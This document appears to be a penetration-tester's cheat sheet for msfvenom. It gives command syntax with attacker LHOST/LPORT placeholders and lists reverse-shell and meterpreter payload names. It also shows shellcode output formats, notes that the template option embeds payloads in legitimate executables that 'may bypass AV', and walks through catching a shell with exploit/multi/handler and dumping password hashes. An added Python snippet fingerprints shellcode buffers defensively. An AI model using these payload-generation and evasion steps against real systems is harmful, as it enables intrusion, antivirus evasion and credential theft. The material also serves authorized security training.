Msfvenom
General syntax
$ msfvenom --payload <payload> --format <format> --platform <platform> --arch <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> --out <output_file>
# short-form options (--platform has no short form)
$ msfvenom -p <payload> -f <format> --platform <platform> -a <architecture> LHOST=<ATTACKER_ADDR> LPORT=<ATTACKER_LISTEN_PORT> -o <output_file>
Help menu
List available options for module type
Payload option
General naming convention
<OS>/<architecture>/<payload>
OS: Operating system such as Windows, Linux, etc.
Architecture: x64 or x86
32-bit by default, if not specified
Payload: reverse_tcp, bind_tcp, etc.
Common payloads
32-bit variant
windows/shell/reverse_tcp
windows/shell_reverse_tcp
64-bit variant
windows/x64/shell/reverse_tcp | linux/x64/shell/reverse_tcp
windows/x64/shell_reverse_tcp | linux/x64/shell_reverse_tcp
windows/x64/meterpreter/reverse_tcp | linux/x64/meterpreter/reverse_tcp
windows/x64/meterpreter_reverse_tcp | linux/x64/meterpreter_reverse_tcp
Format option
Note: msfvenom outputs shellcode (typically raw machine code) that can be executed on the target architecture; which shellcode is generated is determined by the -p flag. The -f flag only specifies the format in which that shellcode is written out.
E.g. PowerShell
[Byte[]] $buf = 0xfc,0x48,0x83,...
E.g. C
unsigned char buf[] = "\xfc\x48\x83...
E.g. Python
buf = b""
buf += b"\xfc\x48\x8
buf += b"\...
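The note above, worked through as an added example (not part of the original notes): because -f only changes the wrapper syntax, the PowerShell, C and Python renderings decode to the same bytes, so a defender can fingerprint a recovered buffer regardless of how it was formatted. The sample buffers are constructed (the three bytes shown above plus harmless filler), and the function names are hypothetical.

```python
import hashlib
import re

# Constructed samples: the three bytes shown on this page followed by
# harmless filler (NOP, NOP, RET). Not real msfvenom output.
POWERSHELL_SAMPLE = "[Byte[]] $buf = 0xfc,0x48,0x83,0x90,0x90,0xc3"
C_SAMPLE = 'unsigned char buf[] =\n"\\xfc\\x48\\x83"\n"\\x90\\x90\\xc3";'
PYTHON_SAMPLE = 'buf =  b""\nbuf += b"\\xfc\\x48\\x83"\nbuf += b"\\x90\\x90\\xc3"\n'

_ESCAPED = re.compile(r"\\x([0-9a-fA-F]{2})")        # \xfc style (C, Python)
_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{1,2})\b")   # 0xfc style (PowerShell)


def extract_bytes(text: str) -> bytes:
    """Recover the raw bytes from a formatted shellcode buffer."""
    escaped = _ESCAPED.findall(text)
    # Prefer \xNN escapes when present; otherwise fall back to 0xNN literals.
    tokens = escaped if escaped else _LITERAL.findall(text)
    return bytes(int(tok, 16) for tok in tokens)


def fingerprint(text: str) -> str:
    """SHA-256 of the decoded bytes, independent of the wrapper syntax."""
    data = extract_bytes(text)
    if not data:
        raise ValueError("no byte tokens found")
    return hashlib.sha256(data).hexdigest()


def same_payload(*texts: str) -> bool:
    """True when every formatted buffer decodes to identical bytes."""
    return len({fingerprint(t) for t in texts}) == 1


if __name__ == "__main__":
    for name, sample in [("powershell", POWERSHELL_SAMPLE),
                         ("c", C_SAMPLE),
                         ("python", PYTHON_SAMPLE)]:
        print(f"{name:<10} {extract_bytes(sample).hex()} {fingerprint(sample)[:16]}")
    print("same payload:", same_payload(POWERSHELL_SAMPLE, C_SAMPLE, PYTHON_SAMPLE))
```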
Template
can be used to specify a custom executable file to be used as template
this means that the original functionality of the provided executable file will be fulfilled, but with the addition of the payload specified by an attacker
may bypass AV, etc.
CMD
E.g. Generate an x64 Windows .exe payload that executes a certain powershell.exe command (CMD option)
Example
linux/x86/meterpreter/reverse_tcp
Module to use on the attacking machine to catch a shell
exploit/multi/handler
Run the shellcode on the target machine
Gain meterpreter shell on the attacker machine
Using post exploitation hash dump module